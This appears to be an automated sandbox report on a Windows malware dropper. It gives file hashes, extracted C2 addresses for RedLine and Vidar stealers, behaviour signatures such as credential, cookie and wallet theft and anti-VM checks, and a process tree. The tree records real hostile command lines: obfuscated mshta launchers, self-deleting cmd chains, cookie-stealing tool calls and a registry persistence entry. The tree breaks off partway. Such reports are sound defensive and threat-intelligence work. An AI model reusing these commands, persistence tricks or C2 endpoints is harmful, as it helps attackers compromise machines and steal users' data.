Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    316s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    22-08-2021 09:18

General

  • Target

    Setup (13).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

redline

Botnet

@big_tastyyy

C2

pewylicha.xyz:80

Extracted

Family

redline

C2

193.56.146.60:51431

205.185.119.191:18846

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 9 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 32 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 55 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
      PID:1044
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1228
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
        • Modifies registry class
        PID:1092
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
        1⤵
          PID:1296
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s SENS
          1⤵
            PID:1380
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1836
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:60
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                1⤵
                  PID:2368
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2388
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                    1⤵
                      PID:2700
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2716
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Browser
                        1⤵
                          PID:2604
                        • C:\Users\Admin\AppData\Local\Temp\Setup (13).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (13).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:596
                          • C:\Users\Admin\Documents\ZLR679mCIWj4tyYw3S6k3FBg.exe
                            "C:\Users\Admin\Documents\ZLR679mCIWj4tyYw3S6k3FBg.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2284
                            • C:\Users\Admin\AppData\Roaming\3321518.exe
                              "C:\Users\Admin\AppData\Roaming\3321518.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4520
                            • C:\Users\Admin\AppData\Roaming\8765377.exe
                              "C:\Users\Admin\AppData\Roaming\8765377.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:2280
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:4328
                            • C:\Users\Admin\AppData\Roaming\2047924.exe
                              "C:\Users\Admin\AppData\Roaming\2047924.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2964
                            • C:\Users\Admin\AppData\Roaming\6619621.exe
                              "C:\Users\Admin\AppData\Roaming\6619621.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:828
                          • C:\Users\Admin\Documents\dUONlPkIEjqtF4fC7Supl1sM.exe
                            "C:\Users\Admin\Documents\dUONlPkIEjqtF4fC7Supl1sM.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3932
                            • C:\Users\Admin\Documents\dUONlPkIEjqtF4fC7Supl1sM.exe
                              "C:\Users\Admin\Documents\dUONlPkIEjqtF4fC7Supl1sM.exe" -q
                              3⤵
                                PID:4660
                            • C:\Users\Admin\Documents\mvE6ZGvlwrinBOHWYhwXdfkW.exe
                              "C:\Users\Admin\Documents\mvE6ZGvlwrinBOHWYhwXdfkW.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:3396
                              • C:\Users\Admin\Documents\mvE6ZGvlwrinBOHWYhwXdfkW.exe
                                C:\Users\Admin\Documents\mvE6ZGvlwrinBOHWYhwXdfkW.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4116
                            • C:\Users\Admin\Documents\HxWF5ua5yXu98wPgov0534YF.exe
                              "C:\Users\Admin\Documents\HxWF5ua5yXu98wPgov0534YF.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:664
                            • C:\Users\Admin\Documents\4g9hKfVREqTvcBE3VJY7L7U7.exe
                              "C:\Users\Admin\Documents\4g9hKfVREqTvcBE3VJY7L7U7.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:2228
                              • C:\Users\Admin\Documents\4g9hKfVREqTvcBE3VJY7L7U7.exe
                                "C:\Users\Admin\Documents\4g9hKfVREqTvcBE3VJY7L7U7.exe"
                                3⤵
                                  PID:8392
                              • C:\Users\Admin\Documents\V0MSGF7aGAdy3olGZl9q2MZw.exe
                                "C:\Users\Admin\Documents\V0MSGF7aGAdy3olGZl9q2MZw.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2360
                              • C:\Users\Admin\Documents\3YZozR3QXRO93d3aYyvNUyom.exe
                                "C:\Users\Admin\Documents\3YZozR3QXRO93d3aYyvNUyom.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3900
                              • C:\Users\Admin\Documents\MxhqhPTNlSlfNTgyrfdvTPBy.exe
                                "C:\Users\Admin\Documents\MxhqhPTNlSlfNTgyrfdvTPBy.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3188
                              • C:\Users\Admin\Documents\N18X4dyzmx5znPeq4TO6bn6A.exe
                                "C:\Users\Admin\Documents\N18X4dyzmx5znPeq4TO6bn6A.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3096
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im N18X4dyzmx5znPeq4TO6bn6A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\N18X4dyzmx5znPeq4TO6bn6A.exe" & del C:\ProgramData\*.dll & exit
                                  3⤵
                                    PID:5172
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im N18X4dyzmx5znPeq4TO6bn6A.exe /f
                                      4⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5404
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 6
                                      4⤵
                                      • Delays execution with timeout.exe
                                      PID:3312
                                • C:\Users\Admin\Documents\vGcnTTxsnaxrgdFVwHPZIGLA.exe
                                  "C:\Users\Admin\Documents\vGcnTTxsnaxrgdFVwHPZIGLA.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3176
                                • C:\Users\Admin\Documents\l7mdoIxPLVfMXdQx1fCSkJLS.exe
                                  "C:\Users\Admin\Documents\l7mdoIxPLVfMXdQx1fCSkJLS.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1020
                                • C:\Users\Admin\Documents\65tf7vSB5ahwy6Preb4NUo3I.exe
                                  "C:\Users\Admin\Documents\65tf7vSB5ahwy6Preb4NUo3I.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2668
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 660
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4484
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 644
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5092
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 680
                                    3⤵
                                    • Program crash
                                    PID:4764
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 804
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4180
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1160
                                    3⤵
                                    • Program crash
                                    PID:196
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1120
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4764
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1140
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4052
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 1112
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    PID:4232
                                • C:\Users\Admin\Documents\k6WqnxD1TGPMPpl7Oaxv7nUP.exe
                                  "C:\Users\Admin\Documents\k6WqnxD1TGPMPpl7Oaxv7nUP.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2016
                                • C:\Users\Admin\Documents\zX6_FNwIirmuIAP5nq5_ZwY0.exe
                                  "C:\Users\Admin\Documents\zX6_FNwIirmuIAP5nq5_ZwY0.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3912
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 660
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4616
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 676
                                    3⤵
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5048
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 712
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1356
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 644
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4308
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 1120
                                    3⤵
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3208
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 1160
                                    3⤵
                                    • Program crash
                                    PID:4236
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3912 -s 1112
                                    3⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4676
                                • C:\Users\Admin\Documents\k5Y4D1bysw6SwI_GZOoB0U5m.exe
                                  "C:\Users\Admin\Documents\k5Y4D1bysw6SwI_GZOoB0U5m.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4048
                                • C:\Users\Admin\Documents\hCarzL6TZZ63bhJEU8QeQ40B.exe
                                  "C:\Users\Admin\Documents\hCarzL6TZZ63bhJEU8QeQ40B.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1440
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\hCarzL6TZZ63bhJEU8QeQ40B.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\hCarzL6TZZ63bhJEU8QeQ40B.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                    3⤵
                                      PID:4724
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\hCarzL6TZZ63bhJEU8QeQ40B.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\hCarzL6TZZ63bhJEU8QeQ40B.exe" ) do taskkill -f -iM "%~NxA"
                                        4⤵
                                          PID:4668
                                          • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                            hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                            5⤵
                                              PID:4168
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                6⤵
                                                  PID:3460
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                    7⤵
                                                      PID:5340
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                    6⤵
                                                    • Loads dropped DLL
                                                    PID:1828
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -f -iM "hCarzL6TZZ63bhJEU8QeQ40B.exe"
                                                  5⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1648
                                          • C:\Users\Admin\Documents\wXYfbAio_j2krT89nhNUfN5_.exe
                                            "C:\Users\Admin\Documents\wXYfbAio_j2krT89nhNUfN5_.exe"
                                            2⤵
                                              PID:928
                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:4732
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:3716
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:216
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                    PID:1648
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:1756
                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:4864
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4244
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5816
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5940
                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5536
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 4864 -s 1568
                                                      4⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:5900
                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Checks whether UAC is enabled
                                                    • Drops file in Program Files directory
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4800
                                                • C:\Users\Admin\Documents\GRL8i_BuWXXX7kzCUVZ3RaAY.exe
                                                  "C:\Users\Admin\Documents\GRL8i_BuWXXX7kzCUVZ3RaAY.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4628
                                                  • C:\Users\Admin\AppData\Local\Temp\is-HCDI5.tmp\GRL8i_BuWXXX7kzCUVZ3RaAY.tmp
                                                    "C:\Users\Admin\AppData\Local\Temp\is-HCDI5.tmp\GRL8i_BuWXXX7kzCUVZ3RaAY.tmp" /SL5="$6003E,138429,56832,C:\Users\Admin\Documents\GRL8i_BuWXXX7kzCUVZ3RaAY.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:4780
                                                    • C:\Users\Admin\AppData\Local\Temp\is-6JD7V.tmp\Setup.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\is-6JD7V.tmp\Setup.exe" /Verysilent
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:5396
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:5376
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 824
                                                          6⤵
                                                          • Program crash
                                                          PID:5088
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1060
                                                          6⤵
                                                          • Program crash
                                                          PID:7400
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1068
                                                          6⤵
                                                          • Program crash
                                                          PID:7724
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1056
                                                          6⤵
                                                          • Program crash
                                                          PID:7972
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1104
                                                          6⤵
                                                          • Program crash
                                                          PID:7240
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 1164
                                                          6⤵
                                                          • Program crash
                                                          PID:7352
                                                      • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:5500
                                                        • C:\Users\Admin\AppData\Local\Temp\is-OIGOT.tmp\Inlog.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-OIGOT.tmp\Inlog.tmp" /SL5="$2024C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:6084
                                                          • C:\Users\Admin\AppData\Local\Temp\is-CPOUB.tmp\Setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\is-CPOUB.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                            7⤵
                                                              PID:5236
                                                              • C:\Users\Admin\AppData\Local\Temp\is-KTA3A.tmp\Setup.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-KTA3A.tmp\Setup.tmp" /SL5="$402D6,17361401,721408,C:\Users\Admin\AppData\Local\Temp\is-CPOUB.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                8⤵
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:660
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-A1N4D.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                  9⤵
                                                                    PID:1440
                                                                    • C:\Windows\SysWOW64\expand.exe
                                                                      expand C:\Users\Admin\AppData\Local\Temp\is-A1N4D.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                      10⤵
                                                                      • Drops file in Windows directory
                                                                      PID:2384
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                    9⤵
                                                                      PID:4920
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                        10⤵
                                                                          PID:5256
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-A1N4D.tmp\{app}\vdi_compiler.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-A1N4D.tmp\{app}\vdi_compiler"
                                                                        9⤵
                                                                          PID:9116
                                                                          • C:\Windows\SysWOW64\cmd.exe
